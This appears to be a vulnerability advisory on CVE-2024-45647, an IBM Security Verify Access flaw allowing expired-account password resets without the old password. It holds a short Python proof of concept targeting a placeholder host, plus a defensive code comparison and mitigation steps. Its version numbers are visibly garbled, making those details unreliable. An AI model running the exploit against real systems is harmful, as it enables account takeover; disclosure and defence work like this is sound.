A newly discovered security vulnerability, CVE-2024-45647, has been identified in IBM Security Verify Access versions 10.. through 10..8 and IBM Security Verify Access Docker versions 10.. through 10..8. The vulnerability allows an unverified user to change the password of an expired user account without having any knowledge of the original password. This flaw can pose a significant risk to organizations relying on IBM Security Verify Access for user authentication and access management.

The details of this vulnerability, along with a code snippet showcasing the exploit, are provided below, including links to original references and further resources.

Exploit Details

The vulnerability CVE-2024-45647 is a result of an incomplete password validation mechanism in the password reset process for expired user accounts. This means that an attacker could simply request a password change for an expired user account without needing to provide the original password.

Upon successful execution of the exploit, the attacker would then gain access to the compromised account with the newly set password. This unauthorized access could facilitate further attacks, such as privilege escalation, data exfiltration or unauthorized modifications to system configurations.

A sample exploit for CVE-2024-45647 could be implemented using the following Python code:

import requests

# Target instance and the expired account whose password is to be replaced.
TARGET_URL = "https://target-verify-access.example.com"
USER_ID = "expired_user"
NEW_PASSWORD = "new_password"

# Note that no current password is included in the request body.
password_change_payload = {
    "userId": USER_ID,
    "newPassword": NEW_PASSWORD
}

# A timeout keeps the script from hanging if the host does not answer.
response = requests.post(
    f"{TARGET_URL}/password/change",
    json=password_change_payload,
    timeout=10,
)

if response.status_code == 200:
    print(f"Successfully changed the password for {USER_ID}!")
else:
    print(f"Failed to change the password. Response: {response.text}")

This Python script sends a POST request to the target IBM Security Verify Access instance, requesting a password change for the specified expired user account (USER_ID). The password is changed to the value provided in the NEW_PASSWORD variable.
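To make the server-side defect concrete, the following is an added example (not IBM's code and not from the original bulletin) that models the incomplete check described above beside a hardened version: the flawed handler skips current-password verification when the account is expired, the hardened one verifies it unconditionally and only uses the expiry flag to force a reset. Account, hashing and handler names are constructed for the illustration.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


@dataclass
class Account:
    # Constructed model of a user record; not the product's data model.
    user_id: str
    salt: bytes
    pw_hash: bytes
    expired: bool


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_account(user_id: str, password: str, expired: bool = False) -> Account:
    salt = os.urandom(16)
    return Account(user_id, salt, _hash(password, salt), expired)


def verify_password(acct: Account, password: str) -> bool:
    # Constant-time comparison of the derived hash against the stored one.
    return hmac.compare_digest(_hash(password, acct.salt), acct.pw_hash)


def _store(acct: Account, new_password: str) -> None:
    acct.salt = os.urandom(16)
    acct.pw_hash = _hash(new_password, acct.salt)


def change_password_flawed(acct: Account, new_password: str, old_password=None) -> bool:
    # Models the bug class on this page: the old-password check is only
    # applied to non-expired accounts, so an expired account is reset freely.
    if not acct.expired and not verify_password(acct, old_password or ""):
        return False
    _store(acct, new_password)
    return True


def change_password_hardened(acct: Account, new_password: str, old_password) -> bool:
    # The old password is always required and verified; expiry decides only
    # whether the user must change it, never whether proof of it is needed.
    if old_password is None or not verify_password(acct, old_password):
        return False
    _store(acct, new_password)
    acct.expired = False
    return True
```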

Original References and Resources

1. IBM Security Bulletin: https://www.ibm.com/blogs/psirt/ibm-security-bulletin/CVE-2024-45647
2. CVE Details Page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45647
3. National Vulnerability Database Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-45647

Mitigation Steps

IBM has released a security patch to fix this vulnerability. Users are advised to upgrade their IBM Security Verify Access installations to version 10..9 or later and IBM Security Verify Access Docker installations to version 10..9 or later.

Additional best practices include regularly auditing user accounts and their status, ensuring that expired accounts are disabled or removed from the system, and monitoring logs for suspicious activity related to password changes.

Conclusion

CVE-2024-45647 is a critical security vulnerability affecting IBM Security Verify Access and IBM Security Verify Access Docker. It allows unverified users to reset the password and gain unauthorized access to expired user accounts. Users of these software products should take immediate action to apply the security patch provided by IBM and follow best practices to minimize the risk of exploit.

Timeline

Published on: 01/20/2025 15:15:07 UTC